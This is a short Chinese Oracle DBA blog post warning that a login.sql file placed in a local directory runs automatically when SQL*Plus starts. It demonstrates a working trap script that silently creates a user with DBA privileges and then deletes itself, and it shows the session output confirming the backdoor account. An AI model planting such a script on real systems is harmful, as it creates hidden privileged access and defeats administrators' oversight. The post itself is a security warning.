[20140221]login.sql与系统安全.txt

简介: [20140221]login.sql与系统安全.txt --昨天帮别人解决问题,因为显示的问题我需要调整linesize的设置.我发现我的改动不生效. --仔细检查才发现在本地目录有一个login.

[20140221]login.sql与系统安全.txt

--昨天帮别人解决问题,因为显示的问题我需要调整linesize的设置.我发现我的改动不生效.
--仔细检查才发现在本地目录有一个login.sql.

--因为机器是别人的,我突然想到login.sql引起的安全问题.
--如果我在login.sql包含如下内容结果如下呢?

set feedback off
set termout off
create user test1 identified by test1;
grant dba to test1;
set feedback on
host rm ~/login.sql

--以一个dba用户登录:

SCOTT@test> select username from dba_users where username='TEST1';
USERNAME
------------------------------
TEST1

1 row selected.

--退出.

$ ll login.sql
ls: login.sql: No such file or directory

$ sqlplus test1/test1
SQL*Plus: Release 11.2.0.3.0 Production on Fri Feb 21 10:12:51 2014
Copyright (c) 1982, 2011, Oracle.  All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

--看来在提供的机器使用要注意这些细节问题.特别是使用别人的机器访问自己的服务器.

目录
相关文章
|
8月前
|
SQL 存储 Java
4.2 SQL Server获取webshell及提权基础
4.2 SQL Server获取webshell及提权基础
Zp
|
SQL Oracle 关系型数据库
Oracle sql使用sys_guid() 生成32位id乱码解决办法
Oracle sql使用sys_guid() 生成32位id乱码解决办法
Zp
2087 0
Oracle sql使用sys_guid() 生成32位id乱码解决办法
|
SQL Oracle 关系型数据库
[20170724]关于sql_id那些事.txt
[20170724]关于sql_id那些事.txt --//昨天别人问的问题,我以前也写过许多blog,做一些总结: http://blog.itpub.net/267265/viewspace-1357292/ http://blog.
1072 0
|
SQL 关系型数据库
[20150616]关于sql_id.txt
[20150616]关于sql_id.txt --我曾经提到PLSQL中使用绑定变量,oracle会格式化处理,转化为特定的格式。可以参考我以前的例子: --[20121102]PLSQL中的绑定变量.txt --http://blog.itpub.net/267265/viewspace-748190/ --我也曾经写过一篇exact_matching_signature,force_matching。
810 0
|
SQL 存储 Shell
无法使用SQL login去登陆SQL Server - 'Password did not match'
原文: 无法使用SQL login去登陆SQL Server - 'Password did not match' 出自:http://blogs.msdn.com/b/apgcdsd/archive/2011/02/01/sql-login-sql-server-password-did-not-match.aspx 问题描述: 在某一台机器上的management studio,始终无法使用SQL login去登陆SQL Server。
740 0
|
SQL 存储 Shell
无法使用SQL login去登陆SQL Server - 'Password did not match'
原文: 无法使用SQL login去登陆SQL Server - 'Password did not match' 出自:http://blogs.msdn.com/b/apgcdsd/archive/2011/02/01/sql-login-sql-server-password-did-not-match.aspx 问题描述: 在某一台机器上的management studio,始终无法使用SQL login去登陆SQL Server。
794 0
|
数据库 SQL
错误21002:[SQL-DMO]用户"xxx"已经存在
原文: 错误21002:[SQL-DMO]用户"xxx"已经存在 转载自:http://topic.csdn.net/u/20120829/09/faf381b6-d4e9-4f97-a21f-d1adfd43fbe4.
863 0